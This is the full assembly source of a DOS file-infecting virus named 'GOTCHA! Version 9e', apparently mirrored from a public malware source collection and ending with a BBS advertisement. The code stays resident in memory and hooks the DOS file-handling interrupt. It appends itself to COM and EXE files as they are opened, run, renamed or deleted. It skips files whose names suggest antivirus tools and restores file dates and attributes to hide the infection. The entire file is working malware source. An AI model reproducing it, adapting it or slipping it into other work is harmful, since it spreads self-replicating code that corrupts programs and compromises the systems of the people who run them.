mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
577 lines
19 KiB
NASM
577 lines
19 KiB
NASM
;****************************************************************************
|
||
;* GOTCHA! Version 9e
|
||
;****************************************************************************
|
||
|
||
cseg segment
|
||
assume cs:cseg,ds:cseg,es:nothing
|
||
|
||
org 100h
|
||
|
||
SIGNLEN equ signend - signature
|
||
FILELEN equ end - begin
|
||
RESPAR equ (FILELEN/16) + 17
|
||
VERSION equ 9
|
||
BUFLEN equ 20h
|
||
COMSIGN equ 0
|
||
EXESIGN equ 1
|
||
MINTARGET equ 1000
|
||
MAXTARGET equ -FILELEN
|
||
|
||
.RADIX 16
|
||
|
||
|
||
;****************************************************************************
|
||
;* Start the program!
|
||
;****************************************************************************
|
||
|
||
begin: xor bx,bx
|
||
call install
|
||
int 20
|
||
|
||
|
||
;****************************************************************************
|
||
;* Data
|
||
;****************************************************************************
|
||
|
||
buffer db BUFLEN dup (?)
|
||
oi21 dw ?,?
|
||
oldlen dw ?,?
|
||
nameptr dw ?,?
|
||
handle dw ?
|
||
comexe db ?
|
||
|
||
|
||
;****************************************************************************
|
||
;* File-extensions
|
||
;****************************************************************************
|
||
|
||
EXE_txt db 'EXE'
|
||
COM_txt db 'COM'
|
||
|
||
|
||
;****************************************************************************
|
||
;* Interupt handler 24
|
||
;****************************************************************************
|
||
|
||
ni24: mov al,03
|
||
iret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Interupt handler 21
|
||
;****************************************************************************
|
||
|
||
ni21: pushf
|
||
|
||
cmp ax,0DADAh ;install-check ?
|
||
je do_DADA
|
||
|
||
push dx
|
||
push cx
|
||
push bx
|
||
push ax
|
||
push si
|
||
push di
|
||
push ds
|
||
push es
|
||
|
||
cmp ax,6C00h ;open/create 4.00 ?
|
||
je do_6C00
|
||
cmp ah,56h ;rename ?
|
||
je doit
|
||
cmp ah,4Eh ;findfirst ?
|
||
je doit ;(only works without wildcards)
|
||
cmp ah,4Bh ;load / execute ?
|
||
je doit
|
||
cmp ah,43h ;attributes
|
||
je doit
|
||
cmp ah,41h ;delete ?
|
||
je doit ;(it might be un-deleted!)
|
||
cmp ah,3Dh ;open ?
|
||
je do_3D
|
||
|
||
cmp ah,17h ;FCB-rename?
|
||
je doFCB
|
||
cmp ah,13h ;FCB-delete?
|
||
jne exit
|
||
|
||
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
|
||
|
||
doit: call infect
|
||
|
||
exit: pop es
|
||
pop ds
|
||
pop di
|
||
pop si
|
||
pop ax
|
||
pop bx
|
||
pop cx
|
||
pop dx
|
||
popf
|
||
|
||
jmp dword ptr cs:[oi21] ;call to old int-handler
|
||
|
||
|
||
do_3D: test al,03h ;only if opened for READING
|
||
jne exit
|
||
jmp short doit
|
||
|
||
do_6C00: test bl,03h ;idem
|
||
jne exit
|
||
mov dx,di ;ptr was DS:DI
|
||
jmp short doit
|
||
|
||
do_DADA: mov ax,0A500h+VERSION ;return a signature
|
||
popf
|
||
iret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Old Interupt handler 21
|
||
;****************************************************************************
|
||
|
||
org21: pushf
|
||
call dword ptr cs:[oi21] ;call to old int-handler
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
|
||
;****************************************************************************
|
||
|
||
infect: cld
|
||
|
||
mov cs:[nameptr],dx ;save the ptr to the filename
|
||
mov cs:[nameptr+2],ds
|
||
|
||
mov ah,62h ;get segment-adres of PSP
|
||
int 21
|
||
mov ds,bx ;get seg-adres of environment
|
||
mov ax,ds:002Ch
|
||
mov ds,ax
|
||
mov si,0
|
||
|
||
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
|
||
je verder7
|
||
|
||
push cs
|
||
pop es
|
||
mov di,offset envstring
|
||
mov bx,0
|
||
|
||
scloop: mov al,ds:[si] ;check the current env-item
|
||
cmpsb
|
||
je scv1
|
||
inc bx ;characters don't match!
|
||
scv1: cmp al,0 ;end of env-item?
|
||
jne scloop
|
||
|
||
cmp bx,0 ;did all characters match?
|
||
je return
|
||
jmp short envloop
|
||
|
||
verder7: push cs ;check the filename
|
||
pop ds
|
||
les di,dword ptr [nameptr]
|
||
mov dx,di
|
||
mov cx,80 ;search end of filename (-EXT)
|
||
mov al,'.'
|
||
repnz scasb
|
||
mov bx,di
|
||
|
||
std ;find begin of filename
|
||
mov cl,11
|
||
mov al,'\'
|
||
repnz scasb
|
||
cld
|
||
je vvv
|
||
mov di,dx
|
||
jmp short vvv2
|
||
vvv: add di,2
|
||
vvv2: mov al,'V' ;is it V*.* ?
|
||
scasb
|
||
je return
|
||
|
||
mov cl,7 ;is it *AN*.* ?
|
||
mov ax,'NA'
|
||
ANloop: dec di
|
||
scasw
|
||
loopnz ANloop
|
||
je return
|
||
|
||
mov si,offset EXE_txt ;is extension 'EXE'?
|
||
mov di,bx
|
||
mov cx,3
|
||
rep cmpsb
|
||
jnz verder4
|
||
|
||
mov byte ptr [comexe],EXESIGN
|
||
jmp short verder3
|
||
|
||
return: ret
|
||
|
||
verder4: mov si,offset COM_txt ;is extension 'COM'?
|
||
mov di,bx
|
||
mov cx,3
|
||
rep cmpsb
|
||
jnz return
|
||
|
||
mov byte ptr [comexe],COMSIGN
|
||
|
||
verder3: mov ax,3300h ;get ctrl-break flag
|
||
int 21
|
||
push dx
|
||
|
||
xor dl,dl ;clear the flag
|
||
mov ax,3301h
|
||
int 21
|
||
|
||
mov ax,3524h ;get int24 vector
|
||
int 21
|
||
push bx
|
||
push es
|
||
|
||
push cs ;set int24 vec to new handler
|
||
pop ds
|
||
mov dx,offset ni24
|
||
mov ax,2524h
|
||
int 21
|
||
|
||
lds dx,dword ptr [nameptr] ;get file-attribute
|
||
mov ax,4300h
|
||
call org21
|
||
push cx
|
||
|
||
and cx,0F8h ;clear READ-ONLY-flag
|
||
call setattr
|
||
jc return1_v
|
||
|
||
push cs ;open the file
|
||
pop ds
|
||
lds dx,dword ptr [nameptr]
|
||
mov ax,3D02h
|
||
int 21
|
||
jnc verder2
|
||
return1_v: jmp return1 ;something went wrong... :-(
|
||
|
||
verder2: push cs ;save handle
|
||
pop ds
|
||
mov [handle],ax
|
||
|
||
mov bx,[handle] ;get file date & time
|
||
mov ax,5700h
|
||
int 21
|
||
push cx
|
||
push dx
|
||
|
||
call endptr ;get file-length
|
||
mov [oldlen],ax
|
||
mov [oldlen+2],dx
|
||
|
||
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
|
||
sbb dx,0
|
||
mov cx,dx
|
||
mov dx,ax
|
||
mov al,00h
|
||
call ptrmov
|
||
|
||
mov cx,SIGNLEN ;read the last bytes
|
||
mov dx,offset buffer
|
||
call flread
|
||
jc return2_v
|
||
|
||
push cs ;compare bytes with signature
|
||
pop es
|
||
mov di,offset buffer
|
||
mov si,offset signature
|
||
mov cx,SIGNLEN
|
||
rep cmpsb
|
||
jz return2_v
|
||
|
||
call beginptr ;read begin of file
|
||
mov cx,BUFLEN
|
||
mov dx,offset buffer
|
||
call flread
|
||
|
||
cmp byte ptr [comexe],EXESIGN
|
||
jz do_exe
|
||
|
||
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
|
||
jnb return2
|
||
cmp word ptr [oldlen],MINTARGET
|
||
jbe return2
|
||
|
||
call writeprog ;write program to end of file
|
||
jc return2
|
||
|
||
mov ax,[oldlen] ;calculate new start-adres
|
||
add ax,(offset entry - 0103h)
|
||
mov byte ptr [buffer],0E9h ;'JMP'
|
||
mov word ptr [buffer+1],ax
|
||
|
||
jmp short verder1
|
||
|
||
return2_v: jmp short return2
|
||
|
||
|
||
do_exe: call writeprog ;write program to end of file
|
||
jc return2
|
||
|
||
mov ax,[oldlen] ;calculate new length
|
||
mov dx,[oldlen+2]
|
||
add ax,FILELEN
|
||
adc dx,0
|
||
|
||
mov cl,9 ;put new length in header
|
||
shr ax,cl
|
||
mov cl,7
|
||
shl dx,cl
|
||
or ax,dx
|
||
inc ax
|
||
mov word ptr [buffer+4],ax
|
||
mov ax,[oldlen]
|
||
add ax,FILELEN
|
||
and ax,01FFh
|
||
mov word ptr [buffer+2],ax
|
||
|
||
mov ax,[oldlen] ;calculate new CS & IP
|
||
mov dx,[oldlen+2]
|
||
mov bx,word ptr [buffer+8]
|
||
push ax
|
||
mov cl,4
|
||
shr ax,cl
|
||
mov cl,0Ch
|
||
shl dx,cl
|
||
add ax,dx
|
||
sub ax,bx
|
||
mov word ptr [buffer+16h],ax ;put CS in header
|
||
pop ax
|
||
and ax,000Fh
|
||
add ax,(offset entry - 0100h)
|
||
mov word ptr [buffer+14h],ax ;put IP in header
|
||
|
||
verder1: call beginptr ;write new begin of file
|
||
mov cx,BUFLEN
|
||
mov dx,offset buffer
|
||
call flwrite
|
||
|
||
return2: mov bx,[handle] ;restore file date & time
|
||
pop dx
|
||
pop cx
|
||
mov ax,5701h
|
||
int 21
|
||
|
||
mov bx,[handle] ;close the file
|
||
mov ah,3Eh
|
||
int 21
|
||
|
||
return1: pop cx ;restore file-attribute
|
||
call setattr
|
||
|
||
pop ds ;restore int24 vector
|
||
pop dx
|
||
mov ax,2524h
|
||
int 21
|
||
|
||
pop dx ;restore ctrl-break flag
|
||
mov ax,3301h
|
||
int 21
|
||
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Gets ASCIIZ-filename from FCB
|
||
;****************************************************************************
|
||
|
||
FCBtoASC: mov si,dx
|
||
lodsb
|
||
inc al ;extended FCB?
|
||
jne normal_FCB
|
||
add si,7
|
||
normal_FCB: push cs
|
||
pop es
|
||
xor di,di ;adres for ASCIIZ-name
|
||
mov dx,di
|
||
mov cx,8
|
||
FCB_loop: lodsb ;copy all except spaces
|
||
cmp al,' '
|
||
je FCB_verder
|
||
stosb
|
||
FCB_verder: loop FCB_loop
|
||
mov al,'.' ;append a '.'
|
||
stosb
|
||
mov cl,3 ;and the extension
|
||
rep movsb
|
||
xchg ax,cx ;and a final zero.
|
||
stosb
|
||
push es
|
||
pop ds
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Changes file-attributes
|
||
;****************************************************************************
|
||
|
||
setattr: lds dx,dword ptr cs:[nameptr]
|
||
mov ax,4301h
|
||
call org21
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Writes program to end of file
|
||
;****************************************************************************
|
||
|
||
writeprog: call endptr
|
||
mov cx,FILELEN
|
||
mov dx,offset begin
|
||
; call flwrite ;Hmm, save a few bytes!
|
||
; ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Subroutines for reading/writing
|
||
;****************************************************************************
|
||
|
||
flwrite: mov ah,40h
|
||
jmp short flvrdr
|
||
|
||
flread: mov ah,3Fh
|
||
flvrdr: push cs
|
||
pop ds
|
||
mov bx,cs:[handle]
|
||
int 21
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Subroutines for file-pointer
|
||
;****************************************************************************
|
||
|
||
beginptr: mov al,00h ;go to begin of file
|
||
jmp short ptrvrdr
|
||
|
||
endptr: mov al,02h ;go to end of file
|
||
ptrvrdr: xor cx,cx
|
||
xor dx,dx
|
||
|
||
ptrmov: mov bx,cs:[handle] ;go somewhere
|
||
mov ah,42h
|
||
int 21
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* This is where infected files start
|
||
;****************************************************************************
|
||
|
||
entry: call entry2
|
||
entry2: pop bx
|
||
sub bx,offset entry2 ;CS:BX is begin program - 100h
|
||
|
||
pushf
|
||
cld
|
||
|
||
cmp byte ptr cs:[bx+offset comexe],COMSIGN
|
||
jz entryC
|
||
|
||
entryE: mov ax,ds ;put old start-adres on stack
|
||
add ax,10
|
||
add ax,cs:[bx+offset buffer+016h]
|
||
push ax
|
||
push cs:[bx+offset buffer+014h]
|
||
|
||
jmp short entcheck
|
||
|
||
entryC: mov ax,bx ;restore old file-begin
|
||
add ax,offset buffer
|
||
mov si,ax
|
||
mov di,0100
|
||
mov cx,BUFLEN
|
||
rep movsb
|
||
|
||
push cs ;put old start-adres on stack
|
||
mov ax,0100h
|
||
push ax
|
||
|
||
entcheck: mov ax,0DADAh ;already installed?
|
||
int 21h
|
||
cmp ah,0A5h
|
||
je entstop
|
||
|
||
call install ;install the program
|
||
|
||
entstop: iret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Install the program at top of memory
|
||
;****************************************************************************
|
||
|
||
install: push ds
|
||
push es
|
||
|
||
xor ax,ax ;get original int21 vector
|
||
mov es,ax
|
||
mov cx,word ptr es:0084h
|
||
mov dx,word ptr es:0086h
|
||
mov cs:[bx+offset oi21],cx
|
||
mov cs:[bx+offset oi21+2],dx
|
||
|
||
mov ax,ds ;adjust memory-size
|
||
dec ax
|
||
mov es,ax
|
||
cmp byte ptr es:[0000h],5Ah
|
||
jnz cancel
|
||
mov ax,es:[0003h]
|
||
sub ax,RESPAR
|
||
jb cancel
|
||
mov es:[0003h],ax
|
||
sub es:[0012h], word ptr RESPAR
|
||
|
||
push cs ;copy program to top
|
||
pop ds
|
||
mov es,es:[0012h]
|
||
mov ax,bx
|
||
add ax,0100
|
||
mov si,ax
|
||
mov di,0100h
|
||
mov cx,FILELEN
|
||
rep movsb
|
||
|
||
mov dx,offset ni21 ;set vector to new handler
|
||
push es
|
||
pop ds
|
||
mov ax,2521h
|
||
int 21h
|
||
|
||
cancel: pop es
|
||
pop ds
|
||
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Text and Signature
|
||
;****************************************************************************
|
||
|
||
envstring: db 'E=mc<6D>',0 ;put this in your environment!
|
||
|
||
signature: db 'GOTCHA!',0 ;I have got you! :-)
|
||
signend:
|
||
|
||
|
||
|
||
end:
|
||
|
||
cseg ends
|
||
end begin
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|